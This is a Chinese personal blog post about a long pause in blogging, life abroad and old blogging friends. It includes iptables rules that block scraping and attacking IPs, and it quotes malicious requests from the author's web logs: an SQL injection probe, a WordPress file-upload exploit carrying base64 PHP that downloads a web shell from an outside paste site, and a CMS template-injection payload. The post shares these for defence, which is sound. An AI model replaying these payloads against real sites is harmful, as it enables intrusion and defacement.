Gojira 哥斯拉gojira.net
2025年02月17日 星期一 农历二〇二五年正月二十日 [蛇年] 阳历乙巳年戊寅月丁巳日 水瓶座
超过一年半多没更新了,其实经常都想发博客,有几次想写了长篇想发出来,但最后还是按耐住了。
在万恶的资本主义待了有些年头(本次一年三个月)一些见闻一些感受,有时会有一些话想说出来,但感觉又会留下了“把柄”,免得以后给自己添麻烦。也怕一些人的一句:对对对,外国的月亮就是圆……55be4058
这能将我怼的“哑口无言”,毕竟经历不同、认知不同,很难沟通,更别想着服对方了。就如同过年的回去看到些小时的伙伴,却没什么话说一样。所以还是都作罢。
春期间手机基本全程关机,whatsapp、微信这些信息一条不回复(家人除外),这个春节过得不能用不好来形容了,只能算是完全无感,现在成为了叶开plus,从鼓励叶开、理解叶开、成为叶开、超越叶开的路上我越跑越顺……
说上面这句话其实心理负担还是挺重的,担心叶开兄弟瞎想,给他徒增烦恼,但我没一丁点恶意,也相信他不会误会的。
看了下留言,还有两位朋友(紫慕和叶开)记得我,给我送来了春节祝福,感受有点暖心。
他们也是我经常惦记的两位博友,叶开的博客我经常手动打开去看,关键是他的域名qq.md实在他妈的(惊叹、褒义)太好记了! 紫慕90zm.net则是通过蚁阅去看。顺带说一嘴,RSS阅读器我都懒得部署了,蚁阅用起来也挺方便的。
宣布个大消息,我的股票不亏了!盈利就不说了,看者心境不一。但还是要说,大癌真的能不入就不要入!上头了比吸毒还败家,远离它!贝莱德说得真的没错!另外,其实很多时候压榨、收割我们其实并不是所谓的外部势力。
手动封ip-1
近期有空看看web日志,发现采集、攻击太多了,最近这段时间开始了手动封ip,处理这些恶意流量后,总流量降低了至少90%,想着也将这些ip分享出来,总有人能用上的,反正我自己使用,贴出来一下也不费事,以后慢慢累积。
Linux中直接复制执行就可以了。
#2025-02-17
iptables -I INPUT -s 45.192.101.247 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 84.247.151.68 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 175.27.157.221 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 106.215.149.146 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 61.231.66.147 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 206.189.82.216 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 157.245.63.34 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 196.251.90.127 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 103.1.40.166 -p tcp -m multiport --dports 80,443 -j DROP封这些ip一般有几个理由:恶意入侵请求、试探下载网站压缩包、采集。
恶意请求例如:
GET /viewthread.php?action=%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO)),&tid=%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO))
POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?0=echo%20%60echo%20PD9waHAgZndyaXRlKGZvcGVuKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uJy9oay5waHAnLCd3KycpLGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2dob3N0YmluLnNpdGUvb2NidmQvcmF3JykpOyBmd3JpdGUoZm9wZW4oJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2IweC5odG0nLCd3KycpLCdIYWNrZWQgYnkgUnhSJyk7Pz4=%20%7C%20base64%20--decode%60%3Ede.php;&file=p&ticket=H&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_9
POST /?tag/index=&tag=%7Bpbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)%7D(123)%7B/pbhome/Indexoot:if%7D&tagstpl=news.html&lnoc2tspfar1_ue
POST /?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue下面一段封禁了大概 30 多万个阿里云的ip,慎用,不过我自己是封了,它们的请求太多了,不知道是专业代理还是阿里搞的ai模型抓数据?
#封阿里云的一大堆ip,频繁访问,目的不明。
iptables -I INPUT -s 47.100.0.0/14 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 101.132.0.0/16 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 106.14.0.0/15 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 139.196.0.0/16 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 139.224.0.0/16 -p tcp -m multiport --dports 80,443 -j DROP每日分析日志再封禁弄起来确实费事,其实还有更简单的,装个waf就行了,只是个人不喜欢。
我是用fail2ban配合自己手写的脚本写的土防火墙。一直觉得自己定制的才是最好的。
抱歉,刚刚太激动了,连文章都还没看完就留言了!现在是认真看完后,才想要回复的。
一开始我还以为你只是没有更新到网站,毕竟你之前提到过这个情况。没想到原来是因为“万恶的资本主义”。但现在看到你终于更新了,心里真的感到特别高兴。看到这篇文章,许多回忆涌上心头,忍不住有些感伤。记得那时(凡哥、你和我)总是形影不离,彼此之间有那么多共同的时光。可是时光不留人,我们都在变。你停更了,凡哥也在结婚后开始专注自己的生活,我们也不像以前那样频繁出现在评论区了。
很多事情确实都在变化,人的样貌、心态、甚至人际关系,现实中,我一直在深刻体会这些变化。可是我不希望看到你也像这样停下脚步。你是个慷慨又坚强的人,应该像哥斯拉一样勇敢地前行。这不是简单的鼓励,而是我对你一直以来坚持的深深敬意。
在沈阳的那段时间,我也曾一度断绝了与现实的所有社交,只专注于博客更新。那时,我的生活看似简单,去公园散步,享受片刻的宁静。但其实,我知道那是在逃避,后来,生活中的一些打击让我不得不面对现实。当我回到家,面对我妈妈的病情,我也深刻感受到逃避是没有用的。每个人都会有属于自己的时刻,你也是,生活中的一切都只是暂时的,我相信你一定能找到自己的节奏,勇敢面对未来。
你不必担心我会多想,真的很感谢你一直以来的关心和为我着想,这让我觉得特别温暖。
如今,我也在继续迈出自己的步伐。我开始用AI来改变博客的风格和写作内容,虽然我并不知道这种改变是否对,但我知道,可能会让一些熟悉的朋友感到不适应。我自己也是在适应这个过程,但我希望能更真诚地表达我的内心感受。抱歉,给你带来了一些不安。
我死去的记忆开始攻击我啦!!
日更博主变年更博主啦